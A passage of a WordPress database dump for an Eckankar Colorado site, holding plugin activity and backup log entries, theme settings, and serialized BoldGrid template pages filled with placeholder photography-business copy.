deactivated.\";}i:92;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699996850;s:7:\"message\";s:42:\"Passster plugin (version 4.2.6) activated.\";}i:93;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699996946;s:7:\"message\";s:44:\"Passster plugin (version 4.2.6) deactivated.\";}i:94;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699999228;s:7:\"message\";s:53:\"Plugin Notes Plus plugin (version 1.2.6) deactivated.\";}i:95;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1699999434;s:7:\"message\";s:51:\"Plugin Notes Plus plugin (version 1.2.6) activated.\";}i:96;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1700042491;s:7:\"message\";s:118:\"Backup file created: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231115-100016.zip.\";}i:97;a:3:{s:7:\"user_id\";s:7:\"WP Cron\";s:9:\"timestamp\";i:1700042492;s:7:\"message\";s:157:\"Due to retention settings, the following backup was deleted: /home/eckank5/boldgrid_backup/boldgrid-backup-eckankar-colorado.org-9ea03425-20231107-165232.zip\";}i:98;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1700067919;s:7:\"message\";s:42:\"Passster plugin (version 4.2.6) activated.\";}i:99;a:3:{s:7:\"user_id\";i:2;s:9:\"timestamp\";i:1700067971;s:7:\"message\";s:44:\"Passster plugin (version 4.2.6) deactivated.\";}}','no'),(7602544,'action_scheduler_migration_status','complete','yes'),(353,'recently_activated','a:1:{s:39:\"content-protector/content-protector.php\";i:1700067971;}','yes'),(422,'boldgrid_mobile_ratio','12:1105','no'),(678,'boldgrid_survey','a:2:{s:8:\"blogname\";a:1:{s:5:\"value\";s:20:\"Eckankar in Colorado\";}s:6:\"social\";a:4:{s:8:\"facebook\";s:32:\"http://www.facebook.com/Eckankar\";s:7:\"twitter\";s:28:\"http://twitter.com/@eckankar\";s:8:\"linkedin\";s:43:\"https://www.instagram.com/EckankarOfficial/\";s:7:\"youtube\";s:48:\"http://www.youtube.com/user/ECKANKAROfficialSite\";}}','yes'),(683,'boldgrid_theme_revision_Wedge','20190416100615-412','yes'),(684,'allowedthemes','a:2:{s:14:\"boldgrid-wedge\";b:1;s:14:\"boldgrid-hydra\";b:1;}','no'),(685,'theme_mods_boldgrid-wedge','a:1:{s:20:\"force_scss_recompile\";a:2:{s:6:\"active\";b:1;s:7:\"staging\";b:1;}}','yes'),(686,'current_theme','Hydra','yes'),(687,'theme_switched','','yes'),(691,'wpforms_version','1.5.3','yes'),(692,'wpforms_activated','a:1:{s:4:\"lite\";i:1562170527;}','yes'),(712,'boldgrid_static_pages','a:1:{s:5:\"pages\";a:2:{s:16:\"pages_in_pageset\";a:11:{i:0;O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"53\";s:16:\"page_revision_id\";s:4:\"1417\";s:10:\"page_title\";s:4:\"Home\";s:9:\"page_slug\";s:4:\"home\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:2220:\"\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12\">\n<div class=\"mod-alpha\">\n<h2>THE BEST IMAGES ARE THE ONES THAT RETAIN THEIR STRENGTH AND IMPACT OVER THE YEARS, REGARDLESS OF THE NUMBER OF TIMES THEY ARE VIEWED.</h2>\n<h3>- ANNE GEDDES</h3>\n</div>\n</div>\n</div></div></div>\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n\n<hr></div>\n</div>\n</div>\n</div></div></div>\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12\">\n<h2>ABOUT</h2>\n<p class=\"mod-reset\"><img class=\"aligncenter size-full img-circle wp-image-7176\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/tmp_bio-image-cropped-imhwpb-wycl1rxpeluuyov.jpg\" alt=\"bio-image-cropped\" data-imhwpb-asset-id=\"28768\" height=\"125\" width=\"125\"></p>\nWe understand the need to feel as if you\'re in the middle of an event, crisis or situation where images mean more than anything. That\'s why we\'re in the middle of the fray, bringing each and every person a piece of the action as it occurs.\n<p class=\"p-button-primary\"><a class=\"button-primary\" href=\"about-us\">READ MORE</a></p>\n\n</div>\n</div></div></div>\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n\n<hr></div>\n</div>\n</div>\n</div></div></div>\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12\">\n<h2>FEATURED WORK</h2>\nHere are shots of major events and situations all over the world.\n\n</div>\n</div></div></div>\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12\">\n\n[gallery targetsize=\"full\" gutterwidth=\"15\" link=\"file\" size=\"large\"  ids=\"7177,7178,7179,7180,7181,7182\"  data-imhwpb-assets=\'38536,38537,38538,38539,38540,38541\' ]\n<p class=\"p-button-primary\"><a class=\"button-primary\" href=\"about-us\">VIEW MORE</a></p>\n\n</div>\n</div></div></div>\n\";s:14:\"checklist_html\";N;s:6:\"layout\";s:8:\"homepage\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";s:2:\"32\";s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"0\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:1;O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"67\";s:16:\"page_revision_id\";s:3:\"326\";s:10:\"page_title\";s:12:\"Blogging 101\";s:9:\"page_slug\";s:12:\"blogging-101\";s:9:\"post_type\";s:4:\"post\";s:4:\"code\";s:0:\"\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"0\";s:10:\"menu_order\";s:1:\"0\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"1\";}i:2;O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"68\";s:16:\"page_revision_id\";s:3:\"331\";s:10:\"page_title\";s:16:\"Basic Taxonomies\";s:9:\"page_slug\";s:16:\"basic-taxonomies\";s:9:\"post_type\";s:4:\"post\";s:4:\"code\";s:0:\"\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"0\";s:10:\"menu_order\";s:1:\"0\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"1\";}i:3;O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"69\";s:16:\"page_revision_id\";s:4:\"1683\";s:10:\"page_title\";s:23:\"Tips For Better Writing\";s:9:\"page_slug\";s:23:\"tips-for-better-writing\";s:9:\"post_type\";s:4:\"post\";s:4:\"code\";s:0:\"\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"0\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"0\";s:10:\"menu_order\";s:1:\"0\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"1\";}i:4;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"1\";s:16:\"page_revision_id\";s:4:\"2693\";s:10:\"page_title\";s:8:\"About Us\";s:9:\"page_slug\";s:8:\"about-us\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:5224:\"\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<h2>An Intrinsic Love for The Craft</h2>\r\n<h4>Capturing Magic Through The Lens</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n<p class=\"\">I\'ve always had a love for awesome photography, since my father took me along on photo shoots as a young child. The way he could capture a special moment, beautiful landscape or someone\'s personality on paper always seemed a little bit like magic. With a Master of Fine Arts from California Institute of the Arts focusing on portrait photography, I\'ve developed that magic in my photography style.</p>\r\n<p class=\"\">Whether it\'s a graduation, wedding, new baby, family portrait or other event you\'d like captured, I\'d be delighted to apply that magical touch through amazing art photography.</p>\r\n\r\n<div class=\"row gridblock\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n<div class=\"gridblock\">\r\n<p class=\"p-button-primary\"><a class=\"button-primary\" href=\"#\">View Services</a></p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7183\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tLzYzcFA2X0Zsbk1ZLzYwMHg0NTA_3D-imhwpb-wsnb232r7vp46aq-1.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780377\"></p>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-margin-bottom text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7184\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tL09rSlZXU3VoZGljLzYwMHg0NTA_3D-imhwpb-im71egtdtp1xz8x-1.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780378\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-6 col-margin-bottom col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Fine Art Photography</h2>\r\n<h4>One Artistic Eye Deserves Another</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nOver the years, I\'ve developed a good feel for creating exceptional images of your fine art projects. Whether you need new slides for an art show application, shots of you in action for your studio\'s website or just want to capture your beautiful art collection, I can get the photos you need with the spirit you\'re looking for without compromising your artistic vision.\r\n\r\nWe\'ve worked with dozens of artists and fine art collectors over the years to document their artwork. No matter the reason why, I can provide you with documentation that not only documents your artwork, but captures its inner soul.\r\n<div class=\"row gridblock\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n<div class=\"gridblock\">\r\n<p class=\"p-button-primary\"><a class=\"button-primary\" href=\"#\">Visit Gallery</a></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-margin-bottom col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Capturing Special Events</h2>\r\n<h4>Your Biggest Moments Captured, Without Interruption</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nLet\'s face it - a special event is something we look back on for years to come, remembering the good times we\'ve had and the wonderful people we\'ve shared our lives with. Capturing that event is just as important as any other detail you need to work out. My photography will help you capture the magic of the moment, whether it\'s a graduation, wedding, anniversary, baptism or similar special moment in your life.\r\n\r\nBecause I\'ve worked with so many clients in so many different environments, you\'ll barely notice I\'m there - the occasional touch to fix a hem or request to turn slightly is all you\'ll notice. This is just one way I capture the magic.\r\n\r\n</div>\r\n<div class=\"col-md-6 col-margin-bottom text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/5ded70cc-b45e734c-bibacomua150400018-555x250.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"10|landscape\" width=\"555\" class=\"wp-image-7185\"></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\n\";s:14:\"checklist_html\";N;s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"1\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:5;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"3\";s:16:\"page_revision_id\";s:4:\"1855\";s:10:\"page_title\";s:12:\"Testimonials\";s:9:\"page_slug\";s:12:\"testimonials\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:3803:\"\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-3 col-sm-3 text-center col-xs-12\">\r\n<p class=\"mod-img-circle\">\r\n<img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/3d28a41a-79ef96b2-javiindy121200143-300x299.jpg\" data-imhwpb-built-photo-search=\"8|square\" width=\"200\" class=\"wp-image-7186\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-9 col-sm-9 col-xs-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n\"Cat really did an amazing job of getting inside Josh\'s comfort zone and capturing his personality. A shy guy, he doesn\'t let people in easily, so when a friend recommended Blue Moon Photography, I was skeptical at first. We started with engagement photos and were completely blown away by the results. The wedding photos she took touched on magical, the way they captured the love between Sharon and Josh.\"\r\n<h5>Irene Stedler, Mother of the Groom</h5>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-3 col-sm-3 text-center col-xs-12\">\r\n<p class=\"mod-img-circle\">\r\n<img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/6c7dc9a0-9432ead9-deagreez160200673-300x300.jpg\" data-imhwpb-built-photo-search=\"130|square\" width=\"200\" class=\"wp-image-7187\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-9 col-sm-9 col-xs-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n\"By the time I talked to Cat Dyson, I was a complete wreck. I\'d spent good money on several photographers before her, who took the same tired photos I was trying to replace on our website and marketing materials. Cat took the time to get to know each and every person in our office, going above and beyond to capture their true spirit in some fabulous photographs that sold our brand.\"\r\n<h5>Tom Anderson, CEO, Anderson Realty Company</h5>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-3 col-sm-3 text-center col-xs-12\">\r\n<p class=\"mod-img-circle\">\r\n<img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/52f4d458-6410e88a-antonioguillem150500006-300x300.jpg\" data-imhwpb-built-photo-search=\"8|square\" width=\"200\" class=\"wp-image-7188\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-9 col-sm-9 col-xs-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n\"We knew when Ms. Dyson sent in her application that she had great potential. By the time her junior year rolled around, we knew we had an artist on our hands who could capture the true magic in people\'s souls that they rarely let the world see. We\'ve had Cat back on several occasions for workshops and intersession classes. She\'s grown amazingly as a photographer!\"\r\n<h5>Judy Roberts, Dean, New York Academy of Fine Arts</h5>\r\n</div>\r\n</div></div></div>\n\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"3\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:6;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"4\";s:16:\"page_revision_id\";s:4:\"4064\";s:10:\"page_title\";s:7:\"Clients\";s:9:\"page_slug\";s:7:\"clients\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:5564:\"\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-margin-bottom col-xs-12 col-sm-12\">\r\n<h2>Coconut Lane Art Faire, Tampa, FL</h2>\r\n<h4>One of The Best Fine Art Shows in The Country</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nCoconut Lane approached me about documenting their huge annual art show. They had plenty of photographers selling their wares and plenty of amateurs practicing their trade, but didn\'t have anyone documenting the show as it was going on. I had sold at that show in the past and was happy to help as my photography art took a different direction.\r\n\r\nThe show\'s operators were really thrilled with the results. They were able to use the photographs I\'d taken of the show in operation to develop a new line of marketing materials and to replace older, dated photos taken over a decade ago. They\'ve experienced a new revival of interest in the show by both artists and patrons, and lay much of that success with the photographs I\'d taken.\r\n\r\n</div>\r\n<div class=\"col-md-4 col-margin-bottom text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7189\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tL0RkQkdpcWtJdko4LzQ1MHg2MDA_3D-imhwpb-49a8uprzrms95d9.jpg\" alt=\"\" width=\"450\" height=\"600\" data-imhwpb-asset-id=\"780379\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-margin-bottom text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7190\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tL2dXRFBrNUtZTGM0LzYwMHg0NTA_3D-imhwpb-m96l4o6otma6ozb.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780380\"></p>\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7191\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tLzFfQ01vRnNQZnNvLzYwMHg0NTA_3D-imhwpb-nixnmelhgjm2n4h.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780381\"></p>\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7192\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tLzZ5NkQzU19zRWp3LzYwMHg0NTA_3D-imhwpb-kt683fqsr3zl1h5.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780382\"></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\"></div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/7ab5542e-f7254bad-halfpoint150100426-360x200.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"10|landscape\" width=\"360\" class=\"wp-image-7193\"></p>\r\n\r\n<h2>Miller-Haantz Wedding</h2>\r\nThe Miller-Haantz wedding had a beautiful setting near Lake Como. With the outdoor ceremony near sundown, I was able to capture amazing photos of the bride and groom on their special day, capturing the spirit of the bride\'s wildlife conservation interest and the groom\'s love of the outdoors.\r\n\r\n</div>\r\n<div class=\"col-md-4 text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/90cea0d3-b1d846f0-ververidis151001609-360x200.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"10|any\" width=\"360\" class=\"wp-image-7194\"></p>\r\n\r\n<h2>Christensen-Andersen Wedding</h2>\r\nOf all the lovely wedding dresses I have seen over the years, this bride\'s stunning and elaborate dress may take the cake. On top of that, not to be outdone by his beautiful bride, the groom\'s suit was stunning in its own right, making this photo shoot of the elegant new couple an absolute delight.\r\n\r\n</div>\r\n<div class=\"col-md-4 text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7195\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tL3VMWEJlaDZvSG44LzYwMHg0NTA_3D-imhwpb-lqcf3cws5uv6hnv.jpg\" alt=\"\" width=\"600\" height=\"450\" data-imhwpb-asset-id=\"780383\"></p>\r\n\r\n<h2>Anderson Realty Company</h2>\r\nTom Anderson had run into me at a Better Business Bureau meeting with a problem - all his agent\'s photos looked stiff and staged. Over the course of three weeks, I met with all his agents and was able to develop portraits that caught their true personalities.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\n\";s:14:\"checklist_html\";N;s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"4\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:7;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"5\";s:16:\"page_revision_id\";s:4:\"2680\";s:10:\"page_title\";s:6:\"Resume\";s:9:\"page_slug\";s:6:\"resume\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:8737:\"\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Cat Dyson</h2>\r\n<h4>Premier Art Photography</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-sm-12 col-margin-bottom col-xs-12\"></div>\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ad4cb053-270ab43e-ginosphotos100900929-150x220.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"8|portrait\" width=\"150\" class=\"wp-image-7196\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-3 col-xs-12 col-sm-12\">\r\n\r\nPhotographer Cat Dyson has over 20 years of experience in the photography trade. With an eye towards capturing the magic of the moment, she\'s developed techniques that let her slide unnoticed into her client\'s comfort zones.\r\n\r\n</div>\r\n<div class=\"col-md-3 col-sm-11 col-xs-12\">\r\n\r\nIn addition to special event and family portraiture, Ms. Dyson has an extensive background in art photography, capturing images that have won her accolades and awards at a variety of art competitions over the years.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Educational Background</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\"></div>\r\n<div class=\"col-md-8 col-xs-12 col-sm-12\">\r\n\r\nAfter completing a BFA at New York City\'s Academy of Fine Arts and pursuing an MFA specializing in artistic portrait photography, Ms. Dyson has dedicated years to her education. She has spent years working with educational programs in photography that help capture the magic of the moment. As a way of paying forward her degree, she offers a variety of photography technique classes through several different venues, including online and college classes, local and regional art council workshops and national photography convention offerings.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\">A Study of Subjects</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 